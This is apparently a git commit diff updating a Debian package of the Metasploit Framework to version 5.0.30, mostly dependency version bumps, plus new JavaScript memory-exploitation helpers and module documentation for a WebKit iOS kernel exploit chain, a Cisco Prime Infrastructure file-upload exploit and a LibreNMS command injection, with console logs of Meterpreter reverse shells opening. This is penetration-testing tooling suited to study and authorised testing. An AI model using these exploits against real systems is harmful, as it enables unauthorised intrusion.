Commit 08524779 authored by Lorenzo Faletra's avatar Lorenzo Faletra

Update upstream source from tag 'upstream/5.0.30'

Update to upstream version '5.0.30'
with Debian dir 222419acef5678fcd337632b28d959acd1a914a4
parents 76e34e9b 49952bc1
......@@ -11,8 +11,6 @@ addons:
- graphviz
language: ruby
rvm:
- '2.3.8'
- '2.4.5'
- '2.5.5'
- '2.6.2'
......@@ -25,11 +23,6 @@ env:
matrix:
fast_finish: true
exclude:
- rvm: '2.3.8'
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
- rvm: '2.4.5'
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
jobs:
# build docker image
......
PATH
remote: .
specs:
metasploit-framework (5.0.24)
metasploit-framework (5.0.30)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
......@@ -21,9 +21,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.66)
metasploit-payloads (= 1.3.70)
metasploit_data_models (= 3.0.10)
metasploit_payloads-mettle (= 0.5.13)
metasploit_payloads-mettle (= 0.5.16)
mqtt
msgpack
nessus_rest
......@@ -109,10 +109,10 @@ GEM
public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.8.0)
activerecord (>= 3.1.0, < 6)
arel-helpers (2.9.1)
activerecord (>= 3.1.0, < 7)
backports (3.15.0)
bcrypt (3.1.12)
bcrypt (3.1.13)
bcrypt_pbkdf (1.0.1)
bindata (2.4.4)
bit-struct (0.16)
......@@ -125,7 +125,7 @@ GEM
diff-lcs (1.3)
dnsruby (1.61.2)
addressable (~> 2.5)
docile (1.3.1)
docile (1.3.2)
ed25519 (1.2.4)
em-http-request (1.1.5)
addressable (>= 2.3.4)
......@@ -177,7 +177,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.66)
metasploit-payloads (1.3.70)
metasploit_data_models (3.0.10)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
......@@ -188,7 +188,7 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.5.13)
metasploit_payloads-mettle (0.5.16)
method_source (0.9.2)
mini_portile2 (2.4.0)
minitest (5.11.3)
......@@ -224,7 +224,7 @@ GEM
pry (0.12.2)
coderay (~> 1.1.0)
method_source (~> 0.9.0)
public_suffix (3.0.3)
public_suffix (3.1.0)
rack (1.6.11)
rack-protection (1.5.5)
rack
......@@ -261,7 +261,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.20)
rex-exploitation (0.1.21)
jsobfu
metasm
rex-arch
......@@ -301,10 +301,10 @@ GEM
rspec-mocks (~> 3.8.0)
rspec-core (3.8.0)
rspec-support (~> 3.8.0)
rspec-expectations (3.8.3)
rspec-expectations (3.8.4)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.8.0)
rspec-mocks (3.8.0)
rspec-mocks (3.8.1)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.8.0)
rspec-rails (3.8.2)
......@@ -317,7 +317,7 @@ GEM
rspec-support (~> 3.8.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.8.0)
rspec-support (3.8.2)
ruby-macho (2.2.0)
ruby-rc4 (0.1.5)
ruby_smb (1.0.5)
......@@ -325,7 +325,7 @@ GEM
rubyntlm
windows_error
rubyntlm (0.6.2)
rubyzip (1.2.2)
rubyzip (1.2.3)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
......
......@@ -8,9 +8,9 @@ activesupport, 4.2.11.1, MIT
addressable, 2.6.0, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.8.0, MIT
arel-helpers, 2.9.1, MIT
backports, 3.15.0, MIT
bcrypt, 3.1.12, MIT
bcrypt, 3.1.13, MIT
bcrypt_pbkdf, 1.0.1, MIT
bindata, 2.4.4, ruby
bit-struct, 0.16, ruby
......@@ -23,7 +23,7 @@ crass, 1.0.4, MIT
daemons, 1.3.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.61.2, "Apache 2.0"
docile, 1.3.1, MIT
docile, 1.3.2, MIT
ed25519, 1.2.4, MIT
em-http-request, 1.1.5, MIT
em-socksify, 0.3.2, MIT
......@@ -44,11 +44,11 @@ loofah, 2.2.3, MIT
metasm, 1.0.4, LGPL-2.1
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 3.0.3, "New BSD"
metasploit-framework, 5.0.24, "New BSD"
metasploit-framework, 5.0.30, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.3.66, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
metasploit_data_models, 3.0.10, "New BSD"
metasploit_payloads-mettle, 0.5.13, "3-clause (or ""modified"") BSD"
metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
method_source, 0.9.2, MIT
mini_portile2, 2.4.0, MIT
minitest, 5.11.3, MIT
......@@ -71,7 +71,7 @@ pg, 0.21.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.1, MIT
pry, 0.12.2, MIT
public_suffix, 3.0.3, MIT
public_suffix, 3.1.0, MIT
rack, 1.6.11, MIT
rack-protection, 1.5.5, MIT
rack-test, 0.6.3, MIT
......@@ -87,7 +87,7 @@ rex-arch, 0.1.13, "New BSD"
rex-bin_tools, 0.1.6, "New BSD"
rex-core, 0.1.13, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.20, "New BSD"
rex-exploitation, 0.1.21, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
......@@ -104,16 +104,16 @@ rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.8.0, MIT
rspec-core, 3.8.0, MIT
rspec-expectations, 3.8.3, MIT
rspec-mocks, 3.8.0, MIT
rspec-expectations, 3.8.4, MIT
rspec-mocks, 3.8.1, MIT
rspec-rails, 3.8.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.8.0, MIT
rspec-support, 3.8.2, MIT
ruby-macho, 2.2.0, MIT
ruby-rc4, 0.1.5, MIT
ruby_smb, 1.0.5, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.2, "Simplified BSD"
rubyzip, 1.2.3, "Simplified BSD"
sawyer, 0.8.2, MIT
simplecov, 0.16.1, MIT
simplecov-html, 0.10.2, MIT
......
......@@ -22,6 +22,18 @@ unless ENV['BUNDLE_GEMFILE']
end
end
# Remove bigdecimal warning - start
# https://github.com/ruby/bigdecimal/pull/115
# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
# TODO: remove when upgrading from rails 4.x
require 'bigdecimal'
def BigDecimal.new(*args, **kwargs)
return BigDecimal(*args) if kwargs.empty?
BigDecimal(*args, **kwargs)
end
# Remove bigdecimal warning - end
begin
require 'bundler/setup'
rescue LoadError => e
......
......@@ -79,6 +79,18 @@ function Int64(v) {
return '0x' + hexlify(Array.from(bytes).reverse());
};
this.lo = function()
{
var b = this.bytes();
return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
};
this.hi = function()
{
var b = this.bytes();
return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
};
// Basic arithmetic.
// These functions assign the result of the computation to their 'this' object.
......
......@@ -46,6 +46,139 @@ function hexdump(data) {
return lines.join('\n');
}
function strcmp(b, str)
{
var fn = typeof b == "function" ? b : function(i) { return b[i]; };
for(var i = 0; i < str.length; ++i)
{
if(fn(i) != str.charCodeAt(i))
{
return false;
}
}
return fn(str.length) == 0;
}
function b2u32(b)
{
return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
}
function off2addr(segs, off)
{
if(!(off instanceof Int64)) off = new Int64(off);
for(var i = 0; i < segs.length; ++i)
{
var start = segs[i].fileoff;
var end = Add(start, segs[i].size);
if
(
(start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
(end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
)
{
return Add(segs[i].addr, Sub(off, start));
}
}
return new Int64("0x4141414141414141");
}
function fsyms(mem, base, segs, want, syms)
{
want = Array.from(want); // copy
if(syms === undefined)
{
syms = {};
}
var stab = null;
var ncmds = mem.u32(Add(base, 0x10));
for(var i = 0, off = 0x20; i < ncmds; ++i)
{
var cmd = mem.u32(Add(base, off));
if(cmd == 0x2) // LC_SYMTAB
{
var b = mem.read(Add(base, off + 0x8), 0x10);
stab =
{
symoff: b2u32(b.slice(0x0, 0x4)),
nsyms: b2u32(b.slice(0x4, 0x8)),
stroff: b2u32(b.slice(0x8, 0xc)),
strsize: b2u32(b.slice(0xc, 0x10)),
};
break;
}
off += mem.u32(Add(base, off + 0x4));
}
if(stab == null)
{
fail("stab");
}
var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
var fn = function(i)
{
return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
};
for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
{
tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
for(var j = 0; j < want.length; ++j)
{
var s = want[j];
if((strcmp(fn, s)))
{
syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
want.splice(j, 1);
break;
}
}
}
return syms;
}
function strcmp(b, str)
{
var fn = typeof b == "function" ? b : function(i) { return b[i]; };
for(var i = 0; i < str.length; ++i)
{
if(fn(i) != str.charCodeAt(i))
{
return false;
}
}
return fn(str.length) == 0;
}
function _u32(i)
{
return b2u32(this.read(i, 4));
}
function _read(i, l)
{
if (i instanceof Int64) i = i.lo();
if (l instanceof Int64) l = l.lo();
if (i + l > this.length)
{
fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
}
return this.slice(i, i + l);
}
function _readInt64(addr)
{
return new Int64(this.read(addr, 8));
}
function _writeInt64(i, val)
{
if (i instanceof Int64) i = i.lo();
this.set(val.bytes(), i);
}
// Simplified version of the similarly named python module.
var Struct = (function() {
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
......
This diff is collapsed.
This diff is collapsed.
This diff is collapsed.
......@@ -2,9 +2,11 @@ This module plays (by default) ["Epic sax guy 10 hours"](https://www.youtube.com
Naturally, audio should be cranked to 11 before running this module.
Only the deprecated DIAL protocol is supported by this module. Casting via the newer CASTV2 protocol is unsupported at this time.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
1. Do: ```use auxiliary/admin/chromecast/chromecast_youtube```
2. Do: ```set RHOST [IP]```
3. Do: ```run```
......
## Vulnerable Application
This module is able to extract a zip file sent through Modbus from a pcap.
Tested with Schneider TM221CE16R
## Verification Steps
1. Do: `use auxiliary/analyze/modbus_zip`
2. Do: `set PCAPFILE <PATH_TO_PCAP>` where PATH_TO_PCAP is the PATH to the pcap file
3. Do: `exploit` extract the zip file
## Options
**MODE**
Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.
## Scenarios
```
msf > use auxiliary/analyze/modbus_zip
msf auxiliary(analyze/modbus_zip) > set PCAPFILE file.pcap
PCAPFILE => file.pcap
auxiliary(analyze/modbus_zip) > set MODE DOWNLOAD
MODE => DOWNLOAD
msf auxiliary(analyze/modbus_zip) > exploit
[*] Running module against 0.0.0.0
[*] Zip start on packet 1370
[*] Zip end on packet 1452
[*] Done!
[*] Auxiliary module execution completed
```
......@@ -65,7 +65,7 @@ Workstation versions:
- Windows XP SP2 (x86), SP3 (x86), Version 2003 (x64)
- Windows Vista SP0 (x86), SP0 (x64), SP2 (x64)
- Windows 7 SP1 (x86), SP1 (x64)
- Windows 10 1709, ()x64)
- Windows 10 1709, 1809 (x64)
Server versions:
- Windows 2000 SP4 (x86)
......
## Description
This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233).
The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution.
The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.
## Vulnerable Application
The exploit should work all 64-bit devices (iPhone 5S and newer) running iOS 10 up to iOS 11.2.
## Verification Steps
* Start msfconsole
* `use exploit/apple_ios/browser/webkit_createthis`
* `set LHOST` and `SRVHOST` as appropriate
* exploit
* Browse to the given URL with a vulnerable device from Safari
* Note that the payload is specially created for this exploit, due to sandbox
limitations that prevent spawning new processes.
## Scenarios
### 64bit iPhone 5S running iOS 10.2.1
```
msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Started reverse TCP handler on 192.168.1.51:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.51:8080/
[*] Server started.
[*] 192.168.1.34 webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[*] 192.168.1.34 webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[+] 192.168.1.34 webkit_createthis - Sent async_wake exploit
[+] 192.168.1.34 webkit_createthis - Sent sha1 iOS 10 payload
[*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200
msf5 exploit(apple_ios/browser/webkit_createthis) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter aarch64/apple_ios uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34 192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34)
msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1
[*] Starting interaction with 1...
meterpreter > pwd
/System/Library/Frameworks/WebKit.framework/XPCServices/com.apple.WebKit.WebContent.xpc
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
## Description
This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability.
## Vulnerable Application
Cisco Prime Infrastructure releases prior to 3.4.1, 3.5, and 3.6, also EPN Manager releases prior to 3.0.1. The Metasploit module is specifically designed to target CPI 3.4.0.
## Notes on Setup
While developing the exploit, I happended to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first.
Special thanks to Steven Seeley (mr_me) for providing some of the most important setup notes himself.
**Hardware Requirements**
There are two machines you want to set up using the same ISO, the first is called the "primary" server, and the other is "secondary" (High Availability) server. They both require the same hardware:
* 4 CPU Cores.
* 12288 MB of RAM (12GB).
* 350GB of hard drive space, but you may still run out of it in days.
* Both VMs should be on the same network.
**SCP**
In case you want to transfer files, you will probably use scp. Before you do that, run the following script as admin on CPI. It will generate the credentials you need to scp files:
```
/opt/CSCOlumos/bin/getSCPcredentials.sh
```
By default, the CPI's SSH server's authentication method is password, you may end up running scp like this:
```
scp -r -o PreferredAuthentications=password admin@ip:/tmp/something.zip .
```
**Out of Space Issues**
Cisco Prime Infrastructure requires a lot of space on the primary server. If it ever reaches to a point where it shuts down unexpectedly, you may not be able to bring the NCS services back again (such as port 80, 443, or 8082). At least for me, I couldn't figure out. If that's the case, you may need to reinstall the VM.
**Unstable HA Connection**
Sometimes the primary and secondary may experience some difficulty staying connected. If this happens, try to do the following on both machines:
1. Run `ncs stop` to stop the services
2. Run `ncs cleanup`
3. Run `ncs start`, this may take 10 to 30 minutes to finish.
4. Finally, run `ncs status` to make sure they are talking.
If the secondary server isn't working with the primary, then the HealthMonitor service may not be in the exploitable condition.
## Verification Steps
1. Start msfconsole
2. Do `use exploit/linux/http/cpi_tararchive_upload`
3. Do `set payload` to select the preferred payload
4. `set rhosts [ip]`
5. `run`, this should give you a shell
## Scenarios
**Running the check**
```
msf5 exploit(linux/http/cpi_tararchive_upload) > check
[*] 192.168.0.23:8082 - The target service is running, but could not be validated.
```
**Exploiting the service**
```
msf5 exploit(linux/http/cpi_tararchive_upload) > run
[*] Started reverse TCP handler on 192.168.0.21:4444
[*] Uploading tar file (3072 bytes)
[*] Executing JSP stager...
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 3 opened (192.168.0.21:4444 -> 192.168.0.23:57127) at 2019-06-07 02:50:13 -0500
[!] This exploit may require manual cleanup of '/tmp/UdqUlWsFjp.bin' on the target
[!] This exploit may require manual cleanup of 'apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp' on the target
meterpreter >
[+] Deleted /tmp/UdqUlWsFjp.bin
[+] Deleted apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp
```
## Description
In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
is passed to the `popen()` function, which results in execution of arbitrary code.
This module has been tested on LibreNMS `v1.46` and `v1.45`.
## Vulnerable Application
A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.
Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
4. Do: ```set RHOSTS <ip>```
5. Do: ```set USERNAME <user>```
6. Do: ```set PASSWORD <pass>```
7. Do: ```run```
8. You should get a shell.
## Scenarios
### Tested on LibreNMS 1.46 on Ubuntu 18.04
```
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
rhosts => 192.168.37.143
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
username => blah
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password